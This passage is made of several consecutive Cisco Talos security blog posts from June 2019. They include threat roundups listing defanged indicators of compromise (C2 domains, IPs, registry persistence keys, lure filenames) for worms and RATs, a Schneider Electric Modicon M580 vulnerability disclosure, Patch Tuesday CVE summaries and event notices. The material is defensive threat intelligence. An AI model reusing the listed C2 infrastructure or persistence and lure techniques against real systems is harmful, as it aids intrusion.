`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: diozog`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: jkxab`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: hakol`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: baualof`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: leaewi`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: yiiepi`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: dooreab`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: boebit`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: liuolum`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: yifeg`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: kuawea`	1

Mutexes	Occurrences
`A`	24

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`ns1[.]boxonline2[.]net`	24
`ns1[.]boxonline3[.]com`	24
`ns1[.]boxonline1[.]com`	24
`ns1[.]boxonline3[.]org`	24
`ns1[.]boxonline2[.]com`	24
`ns1[.]boxonline3[.]net`	24
`ns1[.]boxonline1[.]net`	24
`ns1[.]boxonline1[.]org`	24
`ns1[.]boxonline2[.]org`	24

Files and or directories created	Occurrences
`\??\E:\autorun.inf`	24
`\autorun.inf`	24
`\??\E:\System Volume Information.exe`	24
`\System Volume Information.exe`	24
`\$RECYCLE.BIN.exe`	24
`\??\E:\$RECYCLE.BIN.exe`	24
`\Secret.exe`	24
`\??\E:\Passwords.exe`	24
`\??\E:\Porn.exe`	24
`\??\E:\Secret.exe`	24
`\??\E:\Sexy.exe`	24
`\??\E:\x.mpeg`	24
`\Passwords.exe`	24
`\Porn.exe`	24
`\Sexy.exe`	24
`%HOMEPATH%\c`	24
`%HOMEPATH%\Passwords.exe`	24
`%HOMEPATH%\Porn.exe`	24
`%HOMEPATH%\Secret.exe`	24
`%HOMEPATH%\Sexy.exe`	24
`%HOMEPATH%\c\Passwords.exe`	24
`%HOMEPATH%\c\Porn.exe`	24
`%HOMEPATH%\c\Secret.exe`	24
`%HOMEPATH%\c\Sexy.exe`	24
`%HOMEPATH%\c\autorun.inf`	24
See JSON for more IOCs

File Hashes

0223f31be057b76cc3c77463a5ac362dfb164d921865d6fac45bc0b342a24987
116a453c9f33b2471e3e4f688e65d9a816039ed8978e4bf9419e0e74d3e4c956
184c4a17e81a3b8628401cec2c3153c8d447427612b0015689e63eb57c6d2929
3d51dc56d04b6b1a770191d01ebd25a8f461e906cbcc4a3c5e95d37c7b117d1a
5050ea8a4fc19652186b7bd5d2376c5772cf7fdcd8f9075731e2c7ece560afc8
83a2a54dfd89718b6f949e79a21b697288197422655c1eef52d410df9583c96a
9aa53a3a52c40afe47a531badf1df6c812c985e5d0d345f00fabf8fad53319b7
9cf7815a0c7da0d55dd202dcbe171d7109a24857ccea16a7ab21827e3fce8386
a1cdaec71cd76dcf37b43c55d7ae9c33dc4d2a6baf55cae35d3214e582c1f9f3
a20512d57c5d82b8df044ac5bfb0f7f345290e8b6e388b3a17ea88671766f9c4
a5cf7dc6a3c6b2fce41a4fcf0f0d98ef1cdd91af9d0e292c6e9142eae0b06b82
afc01f079aec32874f62926770d6cdf74eb19289954fdfe830d0ac17160698bf
b9845e32db4bdf3fc5f795fa7979f092116c3b9b39c364b96bcada6921a81918
b990b6dd7a5bfde334b246c100a95b7dd52611d7167a81e9399f1f191be172e9
ba9f10b7ac5e09f0137206341a4a7ab36e74f6d2d12f84f4057adccbc9d2ea3e
bbbb74ba16e46156f476676ba8e24de3b7b13ee363188a8252f7b2784e9b5e55
be56ffcee4c9fb35af3ba72afb1b4be47ae841390e2ea2966cced4af7dad46d5
c54174b6e003481ce059f05fe0c33d8bdabc5d49cdf82eb3f52436c87ba886e3
cc8cc46b4932f6ec383699a14776bbc573f366a5f3db87e1cd0edafd1b36303f
dae1aa0ccf8af9b1ea58d81097f09ea3af90f7c9bf0bf4d6e03f93fa0224e0f9
edb225e13b85e2680eaf3379f1902afe8059a23b475642076e0b4b3558dd738c
f43b29ce77ef694b43467fd0e69956e46ee69805abd2963bab7d33bbcd0ad4ef
fd17a474fedafc167118316dbad93648c63365e645a1233b9f8ef0aa5d7aa127
ffdd606b64c51d5ec950dee14328c97cac84b75090f77ad7e77c5bf9da20ce08

Coverage

Screenshots of Detection

AMP

ThreatGrid

Exprev

Madshi injection detected (3872)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected (2952)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
PowerShell file-less infection detected (1443)
A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
Process hollowing detected (356)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Dealply adware detected (243)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Gamarue malware detected (194)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Excessively long PowerShell command detected (106)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Installcore adware detected (61)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Fusion adware detected (40)
Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware.
Possible fileless malware download (31)
A site commonly used by fileless malware to download additional data has been detected. Several different families of malware have been observed using these sites to download additional stages to inject into other processes.

↧

Know before you go: Talos Threat Research Summit

June 7, 2019, 7:00 am

≫ Next: The sights and sounds from the Talos Threat Research Summit

≪ Previous: Threat Roundup for May 31 to June 7

We are now just 48 hours away from the second annual Talos Threat Research Summit. After last year's success in Orlando, we are back and better than ever from San Diego on Sunday.

If you plan on attending, here's what you need to know before Sunday morning. Can't make it out? You can still stream our keynote address from Elizabeth Wharton at 8:10 a.m. PT by following us on Twitter.

Event Location

Marriott Marquis San Diego Marina
333 W Harbor Drive, San Diego, Calif. 92101
North Tower, Level 1, Pacific Ballrooms 14-20

Summit Check-in & Badge Pick-up

Your Talos Threat Research Summit registration will be designated on your Cisco Live badge. Your badge can be picked up at the San Diego Convention Center, Hilton Bayfront, Grand Hyatt, and Marriott Marquis at designated locations beginning at 3 p.m. Saturday. Visit our Know Before You Go page to see a full list of locations and times that badge pick up is available. Please pick up your badge on Saturday to ensure a speedy entry into the event on Sunday morning.

The event space opens on Sunday at 7:00 a.m. to serve breakfast and coffee. Breakfast will be served from 7 - 8 a.m.

Please note that at 8:30 a.m., overflow seating will be opened to guests on the standby list. If you arrive late, you may find that only overflow seating is available. Overflow seating does not include a table for your computer/tablet/notebook.

Event Speakers & Agenda

View the speaker list and full agenda on the Cisco Talos Threat Research Summit website.

Event Attire

Casual

Event Shuttle

Hotel Shuttles will be available from designated hotels to the San Diego Convention Center, which is directly next door to the Marriott Marquis San Diego Marina. Signage at the Marriott Marquis will guide you to the North Tower, Level 1, Pacific Ballrooms 14-20.

Cisco Webex Teams

To enhance your Cisco Talos Threat Research Summit program experience, we invite you to join a dedicated Webex Team space to engage with us during the event. Within the Team space, we’ll share announcements, post slide decks, and more. You’ll also be able to ask questions and get answers in live time and connect with your fellow Summit attendees. If you are new to Webex Teams, you will need to download the Webex Team app first before joining the dedicated Talos Summit Team space.

Social Media

Connect with Talos. Use #CLUS and #TTRS19 to connect with other attendees.

If your plans have changed and you no longer are able to attend the Cisco Talos Threat Research Summit, please notify us immediately at ttrs@cisco.com to cancel your registration.

Should you have any questions prior to your arrival please contact the Cisco Talos Threat Research Summit support team at ttrs@cisco.com.

We look forward to seeing you at the Threat Research Summit and at the Talos booth at Cisco Live later in the week.

↧

The sights and sounds from the Talos Threat Research Summit

June 10, 2019, 7:09 am

≫ Next: Vulnerability Spotlight: Multiple vulnerabilities in Schneider Electric Modicon M580

≪ Previous: Know before you go: Talos Threat Research Summit

More than 250 threat hunters, network defenders and analysts gathered ahead of Cisco Live for the second annual Talos Threat Research Summit on Sunday.

The conference by defenders, for defenders, returned this year after the inaugural event in 2018 to San Diego, where speakers passed on their knowledge of writing detection, stopping phishing attacks responding to ransomware, and more.

Liz Wharton, the vice president of operations and strategy at security firm Prevailion, kicked off the day with her keynote address, where she passed on her first-hand knowledge from handling a recent ransomware attack in Atlanta that took the city government offline for weeks.

Wharton discussed how governments and organizations can prepare ahead of time for these attacks, and what the appropriate responses are to these attackers.

You can view a recorded, livestreamed version of her keynote below (apologies for the low-quality audio).

We are live with our Talos Threat Research Summit keynote! Liz Wharton will share what we can learn from recent attacks on governments. https://t.co/FDq7OFAQgB
— Cisco Talos Intelligence Group (@TalosSecurity) June 9, 2019

Other speakers included James Cox, a network server team manager for Howard County, Maryland. Cox was at the forefront of the response to a recent denial-of-service attack on the county's 911 system. You can read a full breakdown of Cox's talk, and the attack, over at the Cisco Newsroom.

We ended the day with a Q&A session with Talos leadership. Attendees asked about the appropriate responses to ransomware attacks, how we develop protections, and more. You can view to entire Q&A below.

Thanks to everyone who came out to this year's Threat Research Summit. We look forward to being back (and bigger) in 2020.

↧

Vulnerability Spotlight: Multiple vulnerabilities in Schneider Electric Modicon M580

June 10, 2019, 1:45 pm

≫ Next: How Cisco Talos helped Howard County recover from a call center attack

≪ Previous: The sights and sounds from the Talos Threat Research Summit

Jared Rittle of Cisco Talos discovered these vulnerabilities.

Executive summary

There are several vulnerabilities in the Schneider Electric Modicon M580 that could lead to a variety of conditions, including denial of service and the disclosure of sensitive information. The Modicon M580 is the latest in Schneider Electric's Modicon line of programmable automation controllers. The majority of the bugs we will discuss exist in UMAS requests made while operating the hardware.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Schneider Electric to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Schneider Electric Modicon M580 UMAS release reservation denial-of-service vulnerability (TALOS-2018-0735/CVE-2018-7846)

An exploitable denial-of-service vulnerability exists in the UMAS Release PLC Reservation function of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to invalidate a session without verifying the authenticity of the sender, resulting in the disconnection of legitimate devices. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS strategy transfer denial-of-service vulnerability (TALOS-2018-0737/CVE-2018-7849)

An exploitable denial-of-service vulnerability exists in the UMAS strategy transfer functionality of the Schneider Electric Modicon M580 programmable automation controller firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a recoverable fault state, resulting in a stoppage of normal device execution. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS block read strategy denial-of-service vulnerability (TALOS-2018-0738/CVE-2018-7843)

An exploitable denial-of-service vulnerability exists in the UMAS memory block read function of the Schneider Electric Modicon M580 programmable automation controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS information disclosure vulnerability (TALOS-2018-0739/CVE-2018-7844)

An exploitable information disclosure vulnerability exists in the UMAS read memory block function of the Schneider Electric Modicon M580 programmable automation controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to return blocks of memory, resulting in the disclosure of plaintext read, write and trap SNMP community strings. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS strategy read information disclosure vulnerability (TALOS-2018-0740/CVE-2018-7848)

An exploitable information disclosure vulnerability exists in the UMAS strategy read functionality of the Schneider Electric Modicon M580 Programmable Automation Controller firmware version SV2.70. A specially crafted UMAS command can cause the device to return blocks of the programed strategy, resulting in the disclosure of plaintext read, write, and trap SNMP community strings. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS improper authentication vulnerability (TALOS-2018-0741/CVE-2018-7842)

An exploitable improper authentication vulnerability exists in the UMAS PLC reservation function of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can allow an attacker to masquerade as an authenticated user, resulting in the ability to bypass password protections in place on the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS strategy file write vulnerability (TALOS-2018-0742/CVE-2018-7847)

An exploitable unauthenticated file write vulnerability exists in the UMAS strategy programming function of the Schneider Electric Modicon M580 programmable automation controller, firmware version SV2.70. A specially crafted sequence of UMAS commands can cause the device to overwrite its programmed strategy, resulting in a wide range of effects, including configuration modifications, disruption of the running process and potential code execution. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UnityPro reliance on untrusted inputs vulnerability (TALOS-2018-0743/CVE-2018-7850)

An exploitable reliance on untrusted inputs vulnerability exists in the strategy transfer function of the Schneider Electric UnityProL Programming Software. When a specially crafted strategy is programmed to a Modicon M580 Programmable Automation Controller, and UnityProL is used to read that strategy, a configuration different from that on the device is displayed to the user. This results in the inability for users of UnityProL to verify that the device is acting as intended. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS read memory block out-of-bounds information disclosure vulnerability (TALOS-2018-0745/CVE-2018-7845)

An exploitable information disclosure vulnerability exists in the UMAS memory block read functionality of the Schneider Electric Modicon M580 Programmable Automation Controller. A specially crafted UMAS request can cause an out-of-bounds read, resulting in the disclosure of sensitive information. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS function code 0x6d multiple denial-of-service vulnerabilities (TALOS-2019-0763/CVE-2018-7852)

Multiple denial-of-service vulnerabilities exist in the UMAS protocol functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. Specially crafted UMAS commands can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger these vulnerabilities.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS function code 0x28 denial-of-service vulnerability (TALOS-2019-0764/CVE-2018-7853)

An exploitable denial-of-service vulnerability exists in the UMAS function code 0x28 functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS function code 0x65 denial-of-service vulnerability (TALOS-2019-0765/CVE-2018-7854)

An exploitable denial-of-service vulnerability exists in the UMAS function code 0x65 functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS set breakpoint denial-of-service vulnerability (TALOS-2019-0766/CVE-2018-7855)

An exploitable denial-of-service vulnerability exists in the UMAS set breakpoint functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS memory block write denial-of-service vulnerability (TALOS-2019-0767/CVE-2018-7856)

An exploitable denial-of-service vulnerability exists in the UMAS memory block write functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS write system coils and holding registers denial-of-service vulnerability (TALOS-2019-0768/CVE-2018-7857)

An exploitable denial-of-service vulnerability exists in the UMAS write system coils and holding registers functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS read system blocks and bits information disclosure vulnerability (TALOS-2019-0769/CVE-2019-6806)

An exploitable information disclosure vulnerability exists in the UMAS Read System Blocks and Bits functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted UMAS command can cause the device to return blocks of memory, resulting in the disclosure of plaintext read, write, and trap SNMP community strings. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric Modicon M580 UMAS write system bits and blocks denial-of-service vulnerability (TALOS-2019-0770/CVE-2019-6807)

An exploitable denial-of-service vulnerability exists in the UMAS write system bits and blocks functionality of the Schneider Electric Modicon M580 Programmable Automation Controller, firmware version SV2.70. A specially crafted set of UMAS commands can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Schneider Electric UnityPro PLC simulator remote code execution vulnerability (TALOS-2019-0771/CVE-2019-6808)

An exploitable remote code execution vulnerability exists in the UMAS strategy programming functionality of the Schneider Electric Unity Pro L Programming Software PLC Simulator. A specially crafted sequence of UMAS commands sent to the software's PLC simulator can cause a modified strategy to be programmed, resulting in code execution when the simulator is switched into the start mode. An attacker can send unauthenticated commands to trigger this vulnerability.

For more information on this vulnerability, read the complete advisory here.

Versions tested

Talos tested and confirmed that that the Schneider Electric Modicon M580, BMEP582040 SV2.70 is affected by these vulnerabilities.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48521 - 48528

↧

How Cisco Talos helped Howard County recover from a call center attack

June 10, 2019, 1:59 pm

≫ Next: Microsoft Patch Tuesday — June 2019: Vulnerability disclosures and Snort coverage

≪ Previous: Vulnerability Spotlight: Multiple vulnerabilities in Schneider Electric Modicon M580

On Aug. 11, 2018 the 911 non-emergency call center in Howard County, Maryland was in crisis — not for the types of calls flooding into dispatchers, but simply for the sheer numbers. The center, which usually receives 300 to 400 calls a day was now getting 2,500 in a 24-hour span of time. The center, which takes calls for everything from home security alarms going off to cats getting stuck in trees was overwhelmed. What was going on?

James Cox, a network-server team manager for the Howard County government was tasked with answering that question. It turns out, a lone foreign actor created this crisis. “The phone system doesn’t care who you are,” Cox explained. “You hit that 10-digit number and the phone rings. There’s no check and there’s no balance.”

At this point, Howard County called on Cisco Talos for assistance. Cox talked about the lessons he learned from this during the second annual Talos Threat Research Summit, a sold-out one-day conference for security professionals who are also attending Cisco Live.

Read the complete story over at the Cisco Newsroom here.

↧

Microsoft Patch Tuesday — June 2019: Vulnerability disclosures and Snort coverage

June 11, 2019, 11:42 am

≫ Next: Threat Roundup for June 7 to June 14

≪ Previous: How Cisco Talos helped Howard County recover from a call center attack

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 88 vulnerabilities, 18 of which are rated “critical," 69 that are considered "important" and one "moderate." This release also includes a critical advisory regarding security updates to Adobe Flash Player.

This month’s security update covers security issues in a variety of Microsoft’s products, including the Chakra scripting engine, the Jet database engine and Windows kernel. For more on our coverage of these bugs, check out the Snort blog post here, covering all of the new rules we have for this release.

Critical vulnerabilities

Microsoft disclosed 19 critical vulnerabilities this month, 10 of which we will highlight below.

CVE-2019-0988, CVE-2019-0989,CVE-2019-0991, CVE-2019-0992, CVE-2019-0993, CVE-2019-1002, CVE-2019-1003 and CVE-2019-1024 are all memory corruption vulnerabilities in the Chakra scripting engine. An attacker could exploit any of these bugs by tricking a user into visiting a specially crafted, malicious website while using the Microsoft Edge browser. If successful, the attacker could then corrupt memory in such a way that would allow them to take control of an affected system.

CVE-2019-0620 is a remote code execution vulnerability in Windows Hyper-V that exists when Hyper-V fails to properly validate input on a host server from an authenticated user using a guest operating system. An attacker could exploit this bug by running a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.

CVE-2019-0888 is a remote code execution vulnerability that exists in the way ActiveX Data Obejcts handles object in memory. An attacker could exploit this vulnerability by tricking the user into visiting a specially crafted, malicious website. If successful, the attacker could then execute code in the context of the current user.

The other critical vulnerabilities are:

Important vulnerabilities

This release also contains 65 important vulnerabilities, one of which we will highlight below.

CVE-2019-1065 is an elevation of privilege vulnerability that occurs when the Windows kernel improperly handles objects in memory. An attacker would first have to log onto the system in order to exploit this vulnerability, and then run a specially crafted application to take control of the system. They would then have the ability to run arbitrary code in kernel mode.

The other important vulnerabilities are:

CVE-2019-0710
CVE-2019-0711
CVE-2019-0713
CVE-2019-0904
CVE-2019-0905
CVE-2019-0906
CVE-2019-0907
CVE-2019-0908
CVE-2019-0909
CVE-2019-0941
CVE-2019-0943
CVE-2019-0959
CVE-2019-0960
CVE-2019-0968
CVE-2019-0972
CVE-2019-0973
CVE-2019-0974
CVE-2019-0977
CVE-2019-0983
CVE-2019-0984
CVE-2019-0986
CVE-2019-0998
CVE-2019-1005
CVE-2019-1007
CVE-2019-1009
CVE-2019-1010
CVE-2019-1011
CVE-2019-1012
CVE-2019-1013
CVE-2019-1014
CVE-2019-1015
CVE-2019-1016
CVE-2019-1017
CVE-2019-1018
CVE-2019-1019
CVE-2019-1021
CVE-2019-1022
CVE-2019-1023
CVE-2019-1025
CVE-2019-1026
CVE-2019-1027
CVE-2019-1028
CVE-2019-1029
CVE-2019-1031
CVE-2019-1032
CVE-2019-1033
CVE-2019-1034
CVE-2019-1035
CVE-2019-1036
CVE-2019-1039
CVE-2019-1040
CVE-2019-1041
CVE-2019-1043
CVE-2019-1044
CVE-2019-1045
CVE-2019-1046
CVE-2019-1047
CVE-2019-1048
CVE-2019-1049
CVE-2019-1050
CVE-2019-1053
CVE-2019-1054
CVE-2019-1064
CVE-2019-1069

Moderate vulnerability

There is one moderate vulnerability, CVE-2019-0948, which is an information disclosure vulnerability in Windows Event Manager.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 44813-44814, 48051-48052, 49762-49765, 50162-50163, 50183-50184, 50198-50199, 50357-50376, 50393-50408, 50411-50414

↧

Threat Roundup for June 7 to June 14

June 14, 2019, 9:58 am

≫ Next: Vulnerability Spotlight: Two bugs in KCodes NetUSB affect some NETGEAR routers

≪ Previous: Microsoft Patch Tuesday — June 2019: Vulnerability disclosures and Snort coverage

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 07 and June 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

Win.Trojan.Gh0stRAT-6993126-0
Trojan
Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Worm.Vobfus-6992861-0
Worm
Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
Win.Dropper.Nymaim-6992731-0
Dropper
Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
PUA.Win.Adware.Qjwmonkey-6992589-0
Adware
Qjwmonkey is adware that modifies the system and browser settings to display advertisements to the user.
Win.Packed.NjRAT-6992540-1
Packed
njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Malware.Tofsee-6992280-0
Malware
Tofsee is multi-purpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
Win.Malware.Yobrowser-6992453-0
Malware
Yobrowser is adware that typically masquerades as cracked versions of legitimate software

Threats

Win.Trojan.Gh0stRAT-6993126-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\Software\Microsoft\Windows Script Host\Settings`	26

Mutexes	Occurrences
`guduyinan.gnway.net`	6
`127.0.0.1`	2
`soiufnrfjowieursmpwoeirfujaiurvnapoai39w45`	2
`y927.f3322.org`	2
`ddos-cc.vicp.cc`	2
`192.168.1.100`	2
`linchen1.3322.org`	2
`\BaseNamedObjects\linchen1.3322.org`	2
`119.98.51.129`	1
`115.28.32.138`	1
`203.156.199.11`	1
`q727446006.gicp.net`	1
`zy520.f3322.org`	1
`169.254.22.15`	1
`118.244.153.46`	1
`121.199.6.242`	1
`192.168.1.68`	1
`850967012.f3322.org`	1
`169.254.25.100`	1
`a678157.oicp.net`	1
`192.168.0.13`	1
`192.168.0.101`	1
`cfhx.f3322.org`	1
`xueyang22.gicp.net`	1
`\BaseNamedObjects\www.touzi1616.com`	1
See JSON for more IOCs

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`118[.]5[.]49[.]6`	2
`197[.]4[.]4[.]12`	2
`115[.]28[.]40[.]12`	2
`49[.]2[.]123[.]56`	2
`118[.]244[.]185[.]113`	2
`116[.]255[.]131[.]145`	2
`174[.]128[.]255[.]245`	1
`189[.]163[.]17[.]5`	1
`54[.]76[.]135[.]1`	1
`188[.]5[.]4[.]96`	1
`61[.]142[.]176[.]23`	1
`27[.]9[.]199[.]217`	1
`110[.]251[.]189[.]65`	1
`114[.]239[.]19[.]101`	1
`222[.]186[.]27[.]216`	1
`115[.]28[.]44[.]116`	1
`123[.]131[.]15[.]109`	1
`120[.]9[.]228[.]6`	1
`119[.]98[.]51[.]129`	1
`101[.]16[.]198[.]98`	1
`203[.]156[.]199[.]11`	1
`115[.]28[.]32[.]138`	1
`169[.]254[.]22[.]15`	1
`121[.]199[.]6[.]242`	1
`118[.]244[.]153[.]46`	1
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`guduyinan[.]gnway[.]net`	5
`y927[.]f3322[.]org`	2
`ddos-cc[.]vicp[.]cc`	2
`linchen1[.]3322[.]org`	2
`xm974192128[.]3322[.]org`	1
`guduyinan[.]gnway[.]com`	1
`278267882[.]f3322[.]org`	1
`a3328657[.]f3322[.]org`	1
`www[.]touzi1616[.]com`	1
`jie0109[.]hackxd[.]net`	1
`zy520[.]f3322[.]org`	1
`q727446006[.]gicp[.]net`	1
`850967012[.]f3322[.]org`	1
`a678157[.]oicp[.]net`	1
`cfhx[.]f3322[.]org`	1
`xueyang22[.]gicp[.]net`	1

Files and or directories created	Occurrences
`%TEMP%\jnbxmapdsg.vbs`	1
`%TEMP%\rlzocrfujx.vbs`	1
`%TEMP%\bvjkzncqf.vbs`	1
`%TEMP%\mxoejtdhe.vbs`	1
`%TEMP%\ofcspybli.vbs`	1
